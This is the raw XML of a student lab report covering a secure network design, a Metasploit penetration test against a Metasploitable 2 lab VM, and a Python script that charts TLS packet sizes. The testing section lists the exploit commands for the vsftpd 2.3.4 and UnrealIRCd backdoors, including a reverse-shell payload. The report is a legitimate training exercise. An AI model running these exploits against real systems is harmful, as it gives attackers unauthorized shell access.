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EDA4C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
        </w:rPr>
        <w:t>Secure Network Design, Penetration Testing, and Encrypted Traffic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED8F3A2">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
        </w:rPr>
        <w:t>Name:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Ishan Chowdhury</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
        </w:rPr>
        <w:t>Date:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>23/09/2025</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B72475C">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>This report covers three main cybersecurity tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE47975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Secure Network Design:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Creating a secure topology for a small organization using VLAN segmentation, a DMZ, and firewall placement to reduce the attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E0587D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Penetration Testing:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Using Metasploit to identify and exploit vulnerabilities in a vulnerable machine (Metasploitable 2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E87908F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Encrypted Traffic Analysis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Capturing and analyzing HTTPS traffic using Wireshark and Python to understand network communication patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA4CADA">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>The goal of this project was to gain hands-on experience in network security design, active exploitation, and passive traffic analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7421BD71">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
        </w:rPr>
        <w:t>1. Network Topology Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D3E52D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1.1 Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEB7E5F">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>The network was designed for a small organization with 10–20 devices.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Key design considerations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B372E4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Firewall:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Protects internal networks by filtering traffic between the internet, DMZ, and internal segments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EA9F37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DMZ (Demilitarized Zone):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hosts public-facing servers such as a web server and mail server, isolated from internal users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10528814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VLAN Segmentation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686F6D76">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>VLAN 10 – Employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78780666">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>VLAN 20 – Guests (fully isolated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10851F7C">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>VLAN 30 – Management/Admin (most secure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEDE5C2"/>
    <w:p w14:paraId="44941CA4"/>
    <w:p w14:paraId="6C680F2D">
      <w:pPr>
        <w:pStyle w:val="4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1.2 Network Diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F3C3D5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720715" cy="3813810"/>
            <wp:effectExtent l="0" t="0" r="9525" b="11430"/>
            <wp:docPr id="2" name="Picture 2" descr="Network Security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Network Security Architecture Diagr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2A21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Figure 1: Secure Network Topology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0D445C"/>
    <w:p w14:paraId="5C8CA3D0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1.3 Security Benefits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1"/>
        <w:gridCol w:w="7178"/>
      </w:tblGrid>
      <w:tr w14:paraId="2EC37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E1C6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33CA27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Security Benefit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="16808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93EA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Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AFB97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Filters and controls inbound/outbound traffic to prevent unauthorized access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="680BA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5405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DMZ Isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CDC5F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Limits damage if a public-facing server is compromised.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="56C22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3BE7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VLAN Segmentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="018992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Prevents malware or attackers from spreading laterally within the organization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64044E01"/>
    <w:p w14:paraId="143176F3"/>
    <w:p w14:paraId="48AD020C"/>
    <w:p w14:paraId="303461EC"/>
    <w:p w14:paraId="649D7339"/>
    <w:p w14:paraId="075A3F68"/>
    <w:p w14:paraId="2C3F2943"/>
    <w:p w14:paraId="0E1EB6D3"/>
    <w:p w14:paraId="1BC99700">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
        </w:rPr>
        <w:t>2. Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3330F3EA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2.1 Tools and Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091A4429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Attacker Machine:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali Linux with Metasploit installed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BCF4D4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Target Machine:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable 2 virtual machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3D4FAA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Network:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-only network </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
        </w:rPr>
        <w:t>192.168.132.0/24</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6607C443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2.2 Vulnerability Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550C3B2D">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Command used to scan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338A5D83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db_nmap -sV 192.168.132.135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3D7762">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="13"/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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/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  <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5730875" cy="4656455"/>
            <wp:effectExtent l="0" t="0" r="14605" b="6985"/>
            <wp:docPr id="3" name="Picture 3" descr="Screenshot 2025-09-23 162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9-23 1628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5AA8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Key open ports discovered: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907"/>
        <w:gridCol w:w="2235"/>
      </w:tblGrid>
      <w:tr w14:paraId="1E803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E018B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Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A0D9A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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4FE4FB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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5D163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598F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w14:paraId="0CC8E6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FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5156AA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vsftpd 2.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4DCA5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AC76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6667</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C6637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IRC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FD77E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UnrealIRCd 3.2.8.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="16004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9D6F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139/445</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DD76A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SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="684F0E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Samba smbd 3.X</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="50140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66D4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8180</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="308670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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="269ECF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Apache Tomcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="511035FD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2.3 Exploit 1 – vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737F2E4C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Description:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The FTP service running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
        </w:rPr>
        <w:t>vsftpd 2.3.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> contains a backdoor vulnerability that allows remote attackers to gain shell access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7BB2A0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Commands Executed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318334DA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 exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7229ECEC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RHOST 192.168.132.135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33081402">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B43D49C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Result:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Successfully gained a shell session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC2718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[*]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Command shell session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opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAB5D30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Post-exploitation Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B171E53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sessions -i </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21189672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whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1224E18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uname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-a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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD457D1"/>
    <w:p w14:paraId="3F39F1D9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727700" cy="4549775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="4" name="Picture 4" descr="Screenshot 2025-09-23 163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9-23 16375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730875" cy="1518285"/>
            <wp:effectExtent l="0" t="0" r="14605" b="5715"/>
            <wp:docPr id="5" name="Picture 5" descr="Screenshot 2025-09-23 163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9-23 16395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D9E9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2.4 Exploit 2 – unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4529840E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Description:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>The IRC service running UnrealIRCd version 3.2.8.1 has a malicious backdoor that allows for remote command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED94D82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Commands Executed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE7EB9F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 exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEEDF59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RHOST 192.168.132.135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E6E762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PAYLOAD cmd/unix/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01624D79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LHOST 192.168.132.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AB05B0">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA3B6A9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Result:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Reverse shell session was opened:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8A88E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[*]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Command shell session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opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429FA181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Post-exploitation Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AACC999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sessions -i 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24082F44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whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C52563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Ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A187587">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="13"/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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5730240" cy="4384675"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="12" name="Picture 12" descr="Screenshot 2025-09-23 164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09-23 1644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50A7EEE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724525" cy="4410710"/>
            <wp:effectExtent l="0" t="0" r="5715" b="8890"/>
            <wp:docPr id="6" name="Picture 6" descr="Screenshot 2025-09-23 164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9-23 16444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724525" cy="4146550"/>
            <wp:effectExtent l="0" t="0" r="5715" b="13970"/>
            <wp:docPr id="7" name="Picture 7" descr="Screenshot 2025-09-23 164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9-23 16450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733415" cy="2376805"/>
            <wp:effectExtent l="0" t="0" r="12065" b="635"/>
            <wp:docPr id="8" name="Picture 8" descr="Screenshot 2025-09-23 164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9-23 16453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F3C7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2.5 Exploit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5"/>
        <w:gridCol w:w="1390"/>
        <w:gridCol w:w="2955"/>
      </w:tblGrid>
      <w:tr w14:paraId="68EC6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BE69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Exploit Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5ABB73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Target Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2269A2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6771E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A2BA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vsftpd_234_backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B0895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21 (FTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F91B3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Successful shell access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6BE6A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DF3C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unreal_ircd_3281_backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="767697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6667 (IRC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E5384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Successful reverse shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B85C391">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
        </w:rPr>
        <w:t>3. Encrypted Traffic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD8D6F0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3.1 Traffic Capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E1F4A7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Tool Used:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086E4EF7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Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4EFB29">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Captured 5 minutes of HTTPS traffic while browsing several secure websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589F176E">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Saved the capture file as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
        </w:rPr>
        <w:t>traffic_capture.pcapng</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBAB0DC">
      <w:pPr>
        <w:pStyle w:val="15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721350" cy="2399665"/>
            <wp:effectExtent l="0" t="0" r="8890" b="8255"/>
            <wp:docPr id="9" name="Picture 9" descr="Screenshot 2025-09-23 165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9-23 1654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4D17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CFFF4AA"/>
    <w:p w14:paraId="77CCC2A2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3.2 Python Analysis Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AB8C10">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>The Python script parses captured packets, extracts metadata, and generates a bar chart of packet size distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3290BF29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pyshark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matplotlib.pyplot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plt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collections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Counter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753E6A6B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7129E98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capture = pyshark.FileCapture(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'traffic_capture.pcapng'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display_filter=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'tls'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2D2B0143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C5C9213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packet_sizes = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E69AB59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ip_counts = Counter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6508D765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packet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capture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAFF068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try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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763BC39C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size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(packet.length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCD795D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src_ip = packet.ip.src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFFF846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dst_ip = packet.ip.dst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B2FAE3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411EBFE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packet_sizes.append(size)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781A0039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ip_counts[src_ip] +=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</w:p>
    <w:p w14:paraId="382C53E9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ip_counts[dst_ip] +=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</w:p>
    <w:p w14:paraId="29512DCD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except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AttributeError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1277A3FF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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350A70D9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Show top IP addressesprint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"\nTop IP addresses by packet count:"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ip, count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ip_counts.most_common(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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603873D8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f"{ip}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{count}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packets")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E07861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Generate histogram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DDA670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plt.hist(packet_sizes, bins=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edgecolor=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'black'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478C22D0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plt.title(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"Packet Size Distribution"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1AED5F13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plt.xlabel(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"Packet Size (bytes)"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7F3E52F2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plt.ylabel(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"Frequency"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763A2B96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plt.savefig(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"packet_size_distribution.png"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1FB80A07">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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plt.show()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7259E7A2"/>
    <w:p w14:paraId="7E1835CC"/>
    <w:p w14:paraId="53BA4443"/>
    <w:p w14:paraId="0F631625"/>
    <w:p w14:paraId="1EB98D50"/>
    <w:p w14:paraId="69950260"/>
    <w:p w14:paraId="23614529"/>
    <w:p w14:paraId="35A3E494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3.3 Sample Output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"/>
      </w:tblGrid>
      <w:tr w14:paraId="73F4A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6ACF2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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="556E201C"/>
    <w:p w14:paraId="7CD2C3E9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721350" cy="2465705"/>
            <wp:effectExtent l="0" t="0" r="8890" b="3175"/>
            <wp:docPr id="10" name="Picture 10" descr="Screenshot 2025-09-23 17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9-23 1700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C56D"/>
    <w:p w14:paraId="3D0F6FC1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3.4 Bar Chart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6340C036"/>
    <w:p w14:paraId="461ABABF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728970" cy="4297045"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:docPr id="11" name="Picture 11" descr="packet_size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packet_size_distribution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E8A6">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
        </w:rPr>
        <w:t>4. Key Learnings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724F54DD">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Understood the importance of network segmentation and DMZ in designing secure networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647070DC">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Learned to identify and exploit vulnerabilities using Metasploit, gaining shell access to a target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7462CC98">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Gained experience in encrypted traffic analysis using Wireshark and Python.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5A7728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Challenges and Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CAD5A6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Database Not Connected Error:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Fixed by starting PostgreSQL service and running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
        </w:rPr>
        <w:t>msfdb init</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507CEAF9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Payload Selection Issue:</w:t>
      </w:r>
      <w:r>
